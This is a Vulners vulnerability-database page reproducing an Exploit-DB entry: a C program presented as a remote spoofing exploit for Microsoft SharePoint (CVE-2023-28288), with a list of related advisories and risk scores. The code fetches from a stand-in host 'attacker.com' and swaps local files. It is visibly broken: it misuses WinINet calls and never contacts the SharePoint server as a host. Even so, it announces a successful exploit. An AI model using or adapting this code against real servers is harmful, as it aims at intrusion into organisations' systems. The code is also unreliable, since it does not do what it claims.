Vulners
Lucene search
Microsoft SharePoint Enterprise Server 2016 - Spoofing
🗓️ 26 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb🔗 www.exploit-db.com👁 344 Views
| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
 | Microsoft SharePoint Enterprise Server 2016 - Spoofing Exploit | 26 Jun 202300:00 | – | zdt |
 | Microsoft SharePoint 安全漏洞 | 11 Apr 202300:00 | – | cnnvd |
 | Microsoft SharePoint Server Spoofing Vulnerability (CNVD-2023-72199) | 13 Apr 202300:00 | – | cnvd |
 | CVE-2023-28288 | 11 Apr 202319:13 | – | cve |
 | CVE-2023-28288 Microsoft SharePoint Server Spoofing Vulnerability | 11 Apr 202319:13 | – | cvelist |
 | EUVD-2023-31995 | 3 Oct 202520:07 | – | euvd |
 | Description of the security update for SharePoint Server 2019: April 11, 2023 (KB5002373) | 11 Apr 202307:00 | – | mskb |
| Description of the security update for SharePoint Server Subscription Edition: April 11, 2023 (KB5002375) | 11 Apr 202307:00 | – | mskb |
| April 11, 2023, cumulative update for SharePoint Enterprise Server 2013 (KB5002381) | 11 Apr 202307:00 | – | mskb |
| Description of the security update for SharePoint Foundation 2013: April 11, 2023 (KB5002383) | 11 Apr 202307:00 | – | mskb |
10
// Exploit Title: Microsoft SharePoint Enterprise Server 2016 - Spoofing
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : Remote
// Vendor Homepage:
// Microsoft SharePoint Foundation 2013 Service Pack 1
// Microsoft SharePoint Server Subscription Edition
// Microsoft SharePoint Enterprise Server 2013 Service Pack 1
// Microsoft SharePoint Server 2019
// Microsoft SharePoint Enterprise Server 2016
// Tested on: Windows/Linux
// CVE : CVE-2023-28288
#include <windows.h>
#include <stdio.h>
// The vulnerable SharePoint server URL
const char *server_url = "http://example.com/";
// The URL of the fake SharePoint server
const char *fake_url = "http://attacker.com/";
// The vulnerable SharePoint server file name
const char *file_name = "vuln_file.aspx";
// The fake SharePoint server file name
const char *fake_file_name = "fake_file.aspx";
int main()
{
HANDLE file;
DWORD bytes_written;
char file_contents[1024];
// Create the fake file contents
sprintf(file_contents, "<html><head></head><body><p>This is a fake file.</p></body></html>");
// Write the fake file to disk
file = CreateFile(fake_file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file == INVALID_HANDLE_VALUE)
{
printf("Error creating fake file: %d\n", GetLastError());
return 1;
}
if (!WriteFile(file, file_contents, strlen(file_contents), &bytes_written, NULL))
{
printf("Error writing fake file: %d\n", GetLastError());
CloseHandle(file);
return 1;
}
CloseHandle(file);
// Send a request to the vulnerable SharePoint server to download the file
sprintf(file_contents, "%s%s", server_url, file_name);
file = CreateFile(file_name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (file == INVALID_HANDLE_VALUE)
{
printf("Error creating vulnerable file: %d\n", GetLastError());
return 1;
}
if (!InternetReadFileUrl(file_contents, file))
{
printf("Error downloading vulnerable file: %d\n", GetLastError());
CloseHandle(file);
return 1;
}
CloseHandle(file);
// Replace the vulnerable file with the fake file
if (!DeleteFile(file_name))
{
printf("Error deleting vulnerable file: %d\n", GetLastError());
return 1;
}
if (!MoveFile(fake_file_name, file_name))
{
printf("Error replacing vulnerable file: %d\n", GetLastError());
return 1;
}
// Send a request to the vulnerable SharePoint server to trigger the vulnerability
sprintf(file_contents, "%s%s", server_url, file_name);
if (!InternetReadFileUrl(file_contents, NULL))
{
printf("Error triggering vulnerability: %d\n", GetLastError());
return 1;
}
// Print a message indicating that the vulnerability has been exploited
printf("Vulnerability exploited successfully.\n");
return 0;
}
BOOL InternetReadFileUrl(const char *url, HANDLE file)
{
HINTERNET internet, connection, request;
DWORD bytes_read;
char buffer[1024];
// Open an Internet connection
internet = InternetOpen("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (internet == NULL)
{
return FALSE;
}
// Connect to the server
connection = InternetConnect(internet, fake_url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (connection == NULL)
{
InternetCloseHandle(internet);
return FALSE;
}
// Send the HTTP request
request = HttpOpenRequest(connection, "GET", url, NULL, NULL, NULL, 0, 0);
if (request == NULL)
{
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
// Read the response data
while (InternetReadFile(request, buffer, sizeof(buffer), &bytes_read) && bytes_read > 0)
{
if (file != NULL)
{
// Write the data to disk
if (!WriteFile(file, buffer, bytes_read, &bytes_read, NULL))
{
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return FALSE;
}
}
}
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(internet);
return TRUE;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2023 00:00Current
8.3High risk
Vulners AI Score8.3
CVSS 3.18.1
EPSS0.09091
SSVC